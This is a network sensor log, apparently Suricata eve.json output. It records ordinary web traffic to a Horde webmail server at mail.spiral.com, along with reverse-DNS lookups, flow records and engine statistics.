{"timestamp":"2020-02-29T00:21:56.266138+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":3}} {"timestamp":"2020-02-29T00:21:56.275652+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28908,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:56.384455+0000","flow_id":1410057873142980,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60566,"proto":"UDP","dns":{"type":"answer","id":28908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:21:56.580929+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26101,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:57.194158+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:57.196504+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":2}} {"timestamp":"2020-02-29T00:21:58.000193+0000","event_type":"stats","stats":{"uptime":14970,"capture":{"kernel_packets":138459,"kernel_drops":0},"decoder":{"pkts":138517,"bytes":94977633,"invalid":193,"ipv4":136960,"ipv6":10,"ethernet":138517,"raw":0,"null":0,"sll":0,"tcp":131440,"udp":5312,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2857,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2873,"synack":2864,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":767,"ssh":0
,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2431,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2513}},"flow_mgr":{"closed_pruned":2830,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18762,"memcap":0}}} {"timestamp":"2020-02-29T00:22:01.001780+0000","flow_id":2248431190397810,"event_type":"flow","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1118,"start":"2020-02-29T00:20:55.119666+0000","end":"2020-02-29T00:21:00.317204+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:22:05.000272+0000","event_type":"stats","stats":{"uptime":14977,"capture":{"kernel_packets":138827,"kernel_drops":0},"decoder":{"pkts":138841,"bytes":95215515,"invalid":194,"ipv4":137282,"ipv6":10,"ethernet":138841,"raw":0,"null":0,"sll":0,"tcp":131757,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2861,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2877,"synack":2868,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":771,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:12.000227+0000","event_type":"stats","stats":{"uptime":14984,"capture":{"kernel_packets":139063,"kernel_drops":0},"decoder":{"pkts":139073,"bytes":95413784,"invalid":194,"ipv4":137514,"ipv6":10,"ethernet":139073,"raw":0,"null":0,"sll":0,"tcp":131989,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2863,"ssn_memcap_drop":0,"pseudo":349,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2879,"synack":2870,"rst":1210,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":773,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:19.000183+0000","event_type":"stats","stats":{"uptime":14991,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:20.000826+0000","flow_id":1653011270062210,"event_type":"flow","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:19.118914+0000","end":"2020-02-29T00:17:19.227917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:23.000273+0000","flow_id":24883672652726,"event_type":"flow","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":30,"bytes_toserver":5358,"bytes_toclient":27904,"start":"2020-02-29T00:21:12.072630+0000","end":"2020-02-29T00:21:22.623690+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.001502+0000","flow_id":610635607832318,"event_type":"flow","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2355,"bytes_toclient":3607,"start":"2020-02-29T00:21:17.456446+0000","end":"2020-02-29T00:21:22.599465+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:22:23.002117+0000","flow_id":764176393698498,"event_type":"flow","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":3359,"bytes_toclient":4267,"start":"2020-02-29T00:21:17.457922+0000","end":"2020-02-29T00:21:22.603314+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.002636+0000","flow_id":103172336909697,"event_type":"flow","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1322,"bytes_toclient":1842,"start":"2020-02-29T00:21:17.589185+0000","end":"2020-02-29T00:21:22.603381+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.003183+0000","flow_id":1543210446686322,"event_type":"flow","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1823,"bytes_toclient":2204,"start":"2020-02-29T00:21:17.591986+0000","end":"2020-02-29T00:21:22.601130+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:22:24.000896+0000","flow_id":1688526354854154,"event_type":"flow","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:23.536842+0000","end":"2020-02-29T00:17:23.645551+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:26.000158+0000","event_type":"stats","stats":{"uptime":14998,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2493,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checke
d":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":18282,"memcap":0}}} {"timestamp":"2020-02-29T00:22:27.010384+0000","flow_id":256953625804596,"event_type":"flow","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:26.393012+0000","end":"2020-02-29T00:17:26.501632+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003172+0000","flow_id":1424381571475841,"event_type":"flow","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.371073+0000","end":"2020-02-29T00:17:27.479187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003571+0000","flow_id":1466579625143878,"event_type":"flow","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.159302+0000","end":"2020-02-29T00:17:27.267472+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:29.476921+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59344,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:29.724003+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088}} {"timestamp":"2020-02-29T00:22:30.000603+0000","flow_id":645583741745750,"event_type":"flow","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:29.293462+0000","end":"2020-02-29T00:17:29.401593+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:31.987599+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47027,"tx_id":0}} {"timestamp":"2020-02-29T00:22:31.998142+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.243374+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488}} 
{"timestamp":"2020-02-29T00:22:32.262695+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.265743+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:22:32.277233+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} 
{"timestamp":"2020-02-29T00:22:32.277645+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:22:32.301116+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.301648+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} 
